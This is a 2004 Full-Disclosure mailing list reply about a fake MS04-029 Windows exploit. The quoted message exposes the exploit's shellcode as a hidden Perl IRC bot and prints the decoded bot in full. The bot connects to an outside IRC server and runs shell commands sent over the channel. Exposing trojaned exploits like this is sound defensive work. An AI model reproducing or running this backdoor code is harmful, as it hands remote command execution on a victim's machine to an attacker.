Message-ID: <9E97F0997FB84D42B221B9FB203EFA272D9C74@dc1ms2.msad.brookshires.net>
From: toddtowles at brookshires.com (Todd Towles)
Subject: New Remote Windows Exploit (MS04-029)

Yep, Dave pointed that out really fast... 

> -----Original Message-----
> From: full-disclosure-admin@...ts.netsys.com 
> [mailto:full-disclosure-admin@...ts.netsys.com] On Behalf Of 
> Barrie Dempster
> Sent: Wednesday, November 03, 2004 3:19 PM
> To: full-disclosure@...ts.netsys.com
> Subject: Re: [Full-Disclosure] New Remote Windows Exploit (MS04-029)
> 
> 
> Excellent exploit, I'm sure no one will spot that perl IRC 
> bot in there, nope no one will see that...
> 
> (hint for the readers, try looking at the ascii out put of 
> the "char *shellcode_payload=" data, looks a little like the 
> following....)
> 
> [code]
> #!/usr/bin/perl
> $c
> han="#0x";$nick="k
> ";$server="ir3ip.n
> et";$SIG{TERM}={};
> exit if fork;use I
> O::Socket;$sock =
> IO::Socket::INET->
> new($server.":6667
> ")||exit;print $so
> ck "USER k +i k :k
> v1\nNICK k\n";$i=1
> ;while(<$sock>=~/^
> [^ ]+ ([^ ]+) /){$
> mode=$1;last if $m
> ode=="001";if($mod
> e=="433"){$i++;$ni
> ck=~s/\d*$/$i/;pri
> nt $sock "NICK $ni
> ck\n";}}print $soc
> k "JOIN $chan\nPRI
> VMSG $chan :Hi\n";
> while(<$sock>){if
> (/^PING (.*)$/){pr
> int $sock "PONG $1
> \nJOIN $chan\n";}i
> f(s/^[^ ]+ PRIVMSG
>  $chan :$nick[^ :\
> w]*:[^ :\w]* (.*)$
> /$1/){s/\s*$//;$_=
> `$_`;foreach(split
>  "\n"){print $sock
>  "PRIVMSG $chan :$
> _\n";sleep 1;}}}#/
> tmp/hi
> 
> [/code]
> 
> --
> Barrie Dempster (zeedo) - Fortiter et Strenue
> 
>   http://www.bsrf.org.uk
> 
> [ gpg --recv-keys --keyserver www.keyserver.net 0x96025FD0 ]
> 
> 
> 
> 

Powered by blists - more mailing lists